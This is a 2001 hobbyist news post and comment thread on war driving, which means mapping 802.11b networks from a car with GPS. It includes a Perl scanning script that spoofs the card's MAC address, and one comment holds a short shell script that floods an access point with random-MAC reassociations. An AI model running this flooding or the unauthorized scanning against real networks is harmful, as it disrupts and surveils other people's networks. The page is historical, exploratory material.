free2air.org || laptop + wireless + GPS + car = War Driving

free2air proudly hosts / provisions

over wireless public access networks

Front Page · Forums · News · Everything · OpenNAP Diaries
Projects : Toy Satellite · East End Net · Air Shadow · Wireless Ant Farm

laptop + wireless + GPS + car = War Driving
By vortex, Section News Posted on Tue Apr 17th, 2001 at 05:40:54 GMT
you will be assimilated ... [UPDATE 17/4] BAWUG (pronounced BORG) hipster Evil Pete in the SF Bay Area got well deserved cred and exposure on securityfocus.com for 802.11b war driving. War driving (driving around an area scanning for wireless networks) is a play on the term war dialling. While threads on 2600-AU were debating whether it's possible, they're overtaken by it being done ... Chris Wysopal (aka Weld Pond) the head R&D honcho at @stake (was l0pht heavy industries) gets their foot in the door here and claims: "it's absolutely huge" ... a grave problem. Hey ... thanks, Chris! Despite WEP's design flaws, most other wireless systems don't even offer interoperable crypto support. Weld must have difficulty justifying his statement "802.11 is inherently less secure than other wireless technology", but he does have a strong interest in beating the scaremongering drum, as @stake has recently "added wireless auditing to their consulting menu". Article author Kevin Poulsen, then scans the mostly academic Berkeley critique of WEP vulnerabilities & design flaws. "Hardware to listen to 802.11 transmissions is readily available to attackers in the form of consumer 802.11 products," reads the paper. "The products possess all the necessary monitoring capabilities, and all that remains for attackers is to convince it to work for them." However, the paper goes on to say that to use these capabilities most effectively, wireless card firmware hacking would be required. Only some firmware versions of some wireless cards can be used in full promiscuous mode to sniff all traffic. So far, the WEP protocol has only had an academic security paper (rightly) targetting its crypto weaknesses. free2air knows of no known implemented 'sploits or published incidents of a successful crypto attack against WEP. Update [2001-8-20 1:5:33 by vortex]: bzzz ... it's here! :-) check out Airsnort in this free2air article. Update [2001-8-28 18:6:24 by vortex]: WEPcrack has also hit the streets. But despite the hype, one thing is for sure: there are truck loads of caveats for implementing wireless gateways in a secured corporate network. A Co-conspirator (you know who you are ;-) and I have performed initial scans (standing relatively still) in the major London financial district of Canary Wharf, and were shocked to have detected around 150 wireless devices - most of which were not even using WEP. Read on for technical resources on the first steps on how to become an 31337 drive-by road warrior ;-) ...

ok, put your geek hat on ...
For position mapping, check out a perl module perl-gps to interface with Garmin GPS units through a serial port.
For signal strength monitoring, combine this with Linux's iwconfig + iwspy (already part of most modern dists) or BSD's wicontrol wireless utility.
Sniffing the wireless interface via tcpdump and parsing/greping through a perl scipt will do it.
Evil Pete pushed the perl script below (for BSD - also easy to port to use linux wtools) to the BAWUG list: It monitors signal strength vs. GPS positioning. It should be fairly easy to hack this to monitor singal strengths of all wireless nodes detected via tcpdump'ing.
more soon on this as I hack the script for Linux - post your comments and adventures here too ...
.vortex
Evil Pete's BSD perl script:
#!/usr/bin/perl # # requires p5-GPS (freebsd:/usr/ports/astro/p5-GPS ) # this is tested with a Garmin eMAP # # Todo: # reset card to the way we found it? # not print repeating data #use strict; use GPS::Garmin; #init shit $|=1; my $shutoff_GPS = 0; # my cause a error, pitty there is no way to power on. my $use_gps = 1; #my $gps_device = "/dev/ttyd0"; my $gps_device = "/dev/cuaa0"; my $delay = 5; # seconds my $wicomm = '/usr/sbin/wicontrol'; my $gps; my ($save_station_name, $save_desired_name, $save_mac_addr); my ($save_power_mgmt, $save_web_crypt, $save_port_type); #-- sub save_card_conf { open(WICO, "$wicomm|") or die "$wicomm Error: $!"; while () { chomp; $save_station_name = $1 if /^Station name:\s+\[(.*)\]$/; $save_desired_name = $1 if /^Desired netname.*\[(.*)\]$/; $save_mac_addr = $1 if /^MAC address:\s+\[(.*)\]$/; $save_power_mgmt = $1 if /^Power Mgmt.*\s+\[(.*)\]$/; $save_web_crypt = $1 if /^WEP encryption:\s+\[(.*)\]$/; $save_port_type = $1 if /^Port type.*\s+\[(.*)\]$/; } close (WICO); if ($save_web_crypt =~ /Off/) { $save_web_crypt = 0; } else { $save_web_crypt = 1; } #$save_desired_name = "ANY" if ($save_desired_name =~ /^\s+$/) ; $save_desired_name = "" if ($save_desired_name =~ /^\s+$/) ; #print "save_station_name \"$save_station_name\"\n"; #print "save_desired_name \"$save_desired_name\"\n"; #print "save_mac_addr \"$save_mac_addr\"\n"; #print "save_power_mgmt \"$save_power_mgmt\"\n"; #print "save_web_crypt \"$save_web_crypt\"\n"; #print "save_port_type \"$save_port_type\"\n"; return; } sub initialize { print "Initializing....\n"; print "\tSaving WLAN card configuration\n"; save_card_conf; $SIG{'INT'} = "shut_it_down"; $SIG{'QUIT'} = "shut_it_down"; print "\treconfigurating WLAN card\n"; system("$wicomm -n \"\""); # "ANY" should work but it dont system("$wicomm -s 'WLAN Scan'"); # Better the the default system("$wicomm -p1"); # Port type BSS system("$wicomm -P0"); # no power save system("$wicomm -e0"); # no encryption system("$wicomm -m DE:AD:DE:AD:DE:AD"); # humor me... # Sadly we can't just probe to see if there is a GPS attached # the library will call "die()" for us if it fails.. if ($use_gps) { print "\tAccessing GPS....\n"; $gps= new GPS::Garmin ( 'Port' => $gps_device, 'Baud' => 9600, ) or warn "Unable to connect to GPS receiver: $!"; } print "\tDone.\n"; return; } sub print_header { my ($sec,$min,$hour,$mday,$mon,$year); my ($prod_id, $soft_ver, $prod_desc); print "My Info:\n\t"; open(WICO, "$wicomm|") or die "$wicomm Error: $!"; while () { chomp; print "Name=\"",$1,"\"\t" if /^Station name:\s+\[(.*)\]$/; print "MAC=",$1,"\t" if /^MAC address:\s+\[(.*)\]$/; print "Serial=",$1,"\t" if /^NIC serial number.*\[(.*)\]$/; #print $1,"\t" if /^Comms.*\[(.*)\]$/; } close(WICO); print "\n"; if ($use_gps) { ($prod_id, $soft_ver, $prod_desc) = $gps->get_product_id; print "GPS Info:\n\t$prod_id\t$soft_ver\t$prod_desc\n\n"; print "Current Time GPS/SYS (GMT):\t"; ($sec,$min,$hour,$mday,$mon,$year) = $gps->get_time; print "$hour\:$min\:$sec\t"; } else { print "NO GPS\t"; } ($sec,$min,$hour,$mday,$mon,$year) = gmtime(time); printf "%2.2d:%2.2d:%2.2d\n", $hour, $min, $sec; print "\n\n\n\n"; return; } sub scan { my ($netname, $curr_bssid, $comm_stat, $ap_density, $port_type); my ($latsign,$lat,$lnsign,$lon) = 0; my ($sec,$min,$hour,$mday,$mon,$year); while (1) { $netname = $curr_bssid = $comm_stat = $ap_density = ""; open(WICO, "$wicomm|") or die "$wicomm Error: $!"; while () { chomp; $netname = $1 if /^Current netname $SSID$:\s+\[(.*)\]$/; $curr_bssid = $1 if /^Current BSSID:\s+\[(.*)\]$/; $comm_stat = $1 if /^Comms.*\[(.*)\]$/; $ap_density = $1 if /^Access point.*\[(.*)\]$/; $port_type = $1 if /^Port type.*\s+\[(.*)\]$/; } close (WICO); if (( $curr_bssid =~ /44:44:44:44:44:44/) || ( length($curr_bssid) == 0 )) { print "<",$curr_bssid,">\t"; #print "44 MAC\n" if ( $curr_bssid =~ /^44:44:44:44:44:44/) ; #print "NULL Id\n" if ( length($curr_bssid) == 0 ); print "SKIPPED\n\n"; } else { if ($use_gps) { ($latsign,$lat,$lnsign,$lon) = $gps->get_position; } printf "$latsign %4.9f \t $lnsign %4.9f", $lat, $lon; print "\t($netname)\n"; print "\t", ($port_type == 1 ? "BBS" : "ad-hoc") ; print "\t(",$curr_bssid,")"; print "\n"; #($sec,$min,$hour,$mday,$mon,$year) = $gps->get_time; ($sec,$min,$hour,$mday,$mon,$year) = gmtime(time); printf "\t%2.2d:%2.2d:%2.2d (GMT)", $hour, $min, $sec; print "\t",$comm_stat; #print "\t",$ap_density; print "\n\n"; } system("$wicomm -p1"); # reset the SSID? sleep $delay; } } sub restore_card_conf{ print "Restoring card conf\n"; system("$wicomm -n \"$save_desired_name\""); system("$wicomm -s \"$save_station_name\""); system("$wicomm -p$save_port_type"); system("$wicomm -P$save_power_mgmt"); system("$wicomm -e$save_web_crypt"); system("$wicomm -m $save_mac_addr"); print "save_station_name \"$save_station_name\"\n"; print "save_desired_name \"$save_desired_name\"\n"; print "save_mac_addr \"$save_mac_addr\"\n"; print "save_power_mgmt \"$save_power_mgmt\"\n"; print "save_web_crypt \"$save_web_crypt\"\n"; print "save_port_type \"$save_port_type\"\n"; return; } sub clean_up { restore_card_conf; if ($shutoff_GPS > 0) { print "powering GPS down\n"; $gps->power_off; } } sub shut_it_down { print "shutting down\n"; clean_up; exit; } sub main { initialize; print_header; scan; clean_up; exit(0); } main; exit;

< lucent clarify ad-hoc / ibss mode incompatabilities (0 comments) | Tele2 expands network (0 comments) >

Menu

· submit story
· create account
· faq
· search
· donate

Login

Make a new account

Username:

Password:

Related Links

· BAWUG
· Evil Pete
· securityfocus.com
· war driving
· war dialling
· 2600-AU
· WEP vulnerabilities & design flaws
· Airsnort
· WEPcrack
· perl-gps
· More on announcement
· Also by vortex

laptop + wireless + GPS + car = War Driving | 5 comments (5 topical, editorial, 0 pending)

f2a node range bandwidth/signal maps none (#1)
by abulafia (ten.ria2eerf@aifaluba) on Sat Apr 14th, 2001 at 08:48:06 GMT
(User Info)

Does anyone know a method to take the data from a script like this and put it into the form of a pretty node range map.

It would be great for f2a nodes to know whet range and connection speeds they can expect in their neck of the woods.

It would even help folks find the best place to mount their antenna by plotting a few different likely fixture points.

et in arcadia ego

May want to link to the 2600-AU threads themselves none (#3)
by Anonymous Hero on Mon May 21st, 2001 at 04:24:11 GMT

The list archives are at:

http://www.2600.org.au/cgi-bin/archive

I mention this because while it sounds like someone claimed it wasn't possible, there are those of us on the list that know that it is :P

You may want to link to the postings that specifically claim it's "not possible" just to be clear that not everyone agrees.

Re: 2600-AU none (#4)
by vortex (gro.ria2eerf@xetrov) on Wed Jun 6th, 2001 at 10:11:07 GMT
(User Info) http://www.free2air.org

Thanks. I want to say now that I've truly appreciated 2600-AU for many years.

And I especially realise that the core participants are very skilled in their areas.

It's a busy list - if I get around to finding the specific postings, I'll link to the articles themselves.

In the meantime, I urge people to subscribe and participate in 2600-AU.

.vortex
[ Parent ]

AP Flooding none (#5)
by vortex (gro.ria2eerf@xetrov) on Wed Aug 15th, 2001 at 08:05:59 GMT
(User Info) http://www.free2air.org

---------- Forwarded message ----------
Date: Tue, 14 Aug 2001 15:08:26 -0800 (AKDT)
From: Xam R Time <xam@archimedes.shmoo.com>
To: tsg@shmoo.com
Subject: wicontrol stuff

can anyone else flood their AP using this too?

I can, so far.

#!/bin/sh
#
#Idea by Xam
#Code ideas by TheChump and Atropos
#mail xam@tacoshell.wi2600.org if desired
#Enjoy!

#clear our card

wicontrol -n ""
sleep .5
wicontrol -s ""
sleep .5
wicontrol -q ""

#main loop for creating our MAC address, and then sets it.
#on a PII-400 laptop, .5 seconds is aobut enough for the 802.11
#card to be set & for it reassociate to a linksys bridge. Card
#happens to be a WPC 11 with sprint 2001 firmware, you will need
#to adjust this. mail me with a sleep interval that works for
#your card/access points.

while true
do
addy=`jot -r -w "%0.2x" -s : 6 0 255`
echo $addy
#I like to have this here to observe it's workings

sleep .5
#sleep for half a second, this may not work on some systems

wicontrol -i wi0 -m $addy
#calls wicontrol(8) to set the new MAC address
#the card then will reassociate. and then again.
#and again. and then again. get the idea?
done

.vortex

Where have the 150 wireless devices gone ? none (#6)
by notty (notty@suidroot.org) on Tue Oct 9th, 2001 at 11:55:26 GMT
(User Info)

Walking past canary wharf the other day with my lucent antenna i decided to check out the 150 free wireless devices described in this article. To my amazement after 30 minutes of searching all we got was 1 measly packet.. just 1. any idea where they have gone ?

[ Parent ]

laptop + wireless + GPS + car = War Driving | 5 comments (5 topical, editorial, 0 pending)

submit story | create account | faq | search